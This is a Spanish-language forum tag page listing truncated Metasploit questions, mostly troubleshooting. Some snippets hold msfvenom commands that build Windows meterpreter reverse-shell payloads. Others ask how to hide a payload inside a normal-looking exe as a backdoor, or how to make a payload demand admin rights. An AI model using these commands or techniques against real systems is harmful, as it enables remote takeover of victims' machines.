Preguntas con etiqueta 'metasploit'

1
respuesta

Metasploit Handler no muestra opciones

Estoy tratando de usar el módulo exploit/multi/handler que he usado antes y no me permite configurar opciones. Los comandos de opciones no muestran nada. Intenté reinstalar ( apt-get remove metasploit-framework && apt-get insta...
hecha 15.12.2018 - 19:45
0
respuestas

¿Cómo funciona la función de descarga del meterpreter de Metasploit?

meterpreter> download /path/to/file y el trabajo se realiza en segundos. ¿Cómo funciona técnicamente desde la perspectiva de la línea de comandos de Windows? Tengo curiosidad, ya que no podemos obtener una sesión de meterpreter cada ve...
hecha 11.12.2018 - 00:34
0
respuestas

Msfvenom: crea una carga de Windows que solicita privilegios de administrador automáticamente

Por lo tanto, puedo crear una carga útil de Windows con msfvenom con un comando simple, por ejemplo: msfvenom --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.58.109 LPORT=4485 EXITFUNC=thread -b '\x00' -f exe-o...
hecha 10.12.2018 - 06:25
0
respuestas

Inyectar una carga útil en un archivo exe

¿Cómo se inyecta una carga útil (por ejemplo, windows / x64 / meterpreter / reverse_tcp) en un archivo exe? Básicamente, cuando el objetivo abre el archivo exe, parece normal y funciona como tal, pero en segundo plano, crea una puerta trasera...
hecha 20.11.2018 - 21:05
0
respuestas

Metasploit: deshabilitar auxiliar / scanner / http / brute_dirs para wmap_scanner

Estoy ejecutando el escáner wmap en uno de mis contenedores de la ventana acoplable con la dirección IP 172.17.0.2 . El contenedor devuelve una respuesta 200 OK a cada URL. Entonces, cuando ejecuto wmap_Scanner , la fuerza br...
hecha 30.10.2018 - 05:32
0
respuestas

Carga genérica / personalizada de Metasploit

He generado una carga útil personalizada utilizando msfvenom como tal ( Primero quiero probar con la carga útil personalizada más simple: sin codificador ni nada ): msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=...
hecha 23.11.2018 - 21:59
1
respuesta

¿Cómo configurar el autoindex del comando central?

Estoy intentando automatizar los scripts de una carga útil Metasploit de Android. Puedo automatizar con éxito cualquier secuencia de comandos en el módulo /post , sin embargo, estoy tratando de automatizar geolocate , dump_calllog...
hecha 25.09.2018 - 18:32
1
respuesta

Cambiando a meterpreter nativo

Me las arreglé para obtener una sesión de meterpreter entre mi Kali Linux y Windows 2016 Server mediante la carga de una carga útil como un servicio web Apache Axis2. Quiero cambiarme a un meterpreter de Windows (para poder utilizar las vulne...
hecha 19.09.2018 - 14:45
0
respuestas

Desinstalar metasploit completamente en Ubuntu

Así que quiero eliminar Metasploit completamente porque hubo un problema que no pude describir. Y quiero volver a instalarlo después de eso. No pude encontrar la secuencia de comandos de desinstalación, por lo que ya eliminé 2 carpetas:    /h...
hecha 27.08.2018 - 20:45
1
respuesta

ubicación del ejecutable generado por msfconsole en Kali linux [cerrado]

Soy nuevo en seguridad y pruebas de lápiz. Estoy utilizando metasploit para generar mi carga útil. He generado una carga útil utilizando generar -t exe -f shell.exe . Pero no puedo encontrar la ubicación del shell.exe en ningún lugar en kali li...
hecha 11.07.2018 - 19:33